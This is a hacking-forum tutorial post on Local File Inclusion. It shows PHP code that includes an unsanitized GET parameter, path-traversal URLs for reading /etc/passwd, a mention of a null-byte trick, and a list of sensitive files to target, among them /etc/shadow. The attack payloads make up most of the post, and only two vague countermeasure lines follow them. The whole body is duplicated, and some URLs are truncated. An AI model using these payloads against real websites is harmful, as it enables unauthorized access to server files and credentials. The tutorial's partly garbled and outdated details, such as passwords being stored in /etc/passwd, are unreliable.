Local File Incusion (LFI) 05-04-2011, 08:17 PM
#1
Local File inclusion is a common website hacking trick. This tutorial will show you how to exploit a website using LFI.
First of all, take a look on the given php code.
<?php
$page=$_GET[page];
include($page);
?>
The above given code is generally used in many website by web developers which should not
be use because the $page isn't sanitized and is passed directly to the webpage. This code is used by hackers for LFI.
In general, you have seen many URL's like this
www.site.com/index.php?page=products.php
the value passed through the query string is used to include products.php page by the above given php code without checking the proper format of value inserted at URL.
suppose we inserted the URL like this..
www.site.com/index.php?page=mypage.php
this mypage.php does not exists on the server so it will show a php error message on the webpage..
Warning: include() [function.include]: Failed opening 'mypage.php' for inclusion.........
here we go..
we know this is vulnerable.
If this website is hosted on a unix server, then we might be able to do a directory transversal to the password file.
The etc/passwd is where the users/passwords are stored
www.mywebsite.com/index.php?page=../etc/passwd
http://www.mywebsite.com/index.php?p.../../etc/passwd
http://www.mywebsite.com/index.php?p.../../etc/passwd
http://www.mywebsite.com/index.php?p.../../etc/passwd
try adding ../ till you get access to the passwd file..
here note one thing.
if the URL is like this.
www.site.com/index.php?page=products
then it means that the php code code is adding page extension manually. So php code is like this
<?php
$page=$_GET[page];
include($page.'php');
?>
in this case use for null extension at last.
www.site.com/index.php?page=../etc/passwd
www.site.com/index.php?page=../../../etc/passwd
http://www.site.com/index.php?page=..../../etc/passwd
and so on
after some effort you will be able to get the content of password file..
You can also view
etc/profile
etc/services
/etc/passwd
/etc/shadow
/etc/group
/etc/security/group
/etc/security/passwd
/etc/security/user
/etc/security/environ
/etc/security/limits
/usr/lib/security/mkuser.default
these files will also give you some useful informations of the server system.
Counter Measures
1. Use the latest web server software
2. Effectively filter the user's input
First of all, take a look on the given php code.
<?php
$page=$_GET[page];
include($page);
?>
The above given code is generally used in many website by web developers which should not
be use because the $page isn't sanitized and is passed directly to the webpage. This code is used by hackers for LFI.
In general, you have seen many URL's like this
www.site.com/index.php?page=products.php
the value passed through the query string is used to include products.php page by the above given php code without checking the proper format of value inserted at URL.
suppose we inserted the URL like this..
www.site.com/index.php?page=mypage.php
this mypage.php does not exists on the server so it will show a php error message on the webpage..
Warning: include() [function.include]: Failed opening 'mypage.php' for inclusion.........
here we go..
we know this is vulnerable.
If this website is hosted on a unix server, then we might be able to do a directory transversal to the password file.
The etc/passwd is where the users/passwords are stored
www.mywebsite.com/index.php?page=../etc/passwd
http://www.mywebsite.com/index.php?p.../../etc/passwd
http://www.mywebsite.com/index.php?p.../../etc/passwd
http://www.mywebsite.com/index.php?p.../../etc/passwd
try adding ../ till you get access to the passwd file..
here note one thing.
if the URL is like this.
www.site.com/index.php?page=products
then it means that the php code code is adding page extension manually. So php code is like this
<?php
$page=$_GET[page];
include($page.'php');
?>
in this case use for null extension at last.
www.site.com/index.php?page=../etc/passwd
www.site.com/index.php?page=../../../etc/passwd
http://www.site.com/index.php?page=..../../etc/passwd
and so on
after some effort you will be able to get the content of password file..
You can also view
etc/profile
etc/services
/etc/passwd
/etc/shadow
/etc/group
/etc/security/group
/etc/security/passwd
/etc/security/user
/etc/security/environ
/etc/security/limits
/usr/lib/security/mkuser.default
these files will also give you some useful informations of the server system.
Counter Measures
1. Use the latest web server software
2. Effectively filter the user's input
![[+]](https://sinister.ly/images/modern/collapse_collapsed.png)
![[Image: owainoct21.jpg?w=708&h=438]](http://owainthomasnews.files.wordpress.com/2009/10/owainoct21.jpg?w=708&h=438)
![[Image: rytwG00.png]](http://i.imgur.com/rytwG00.png)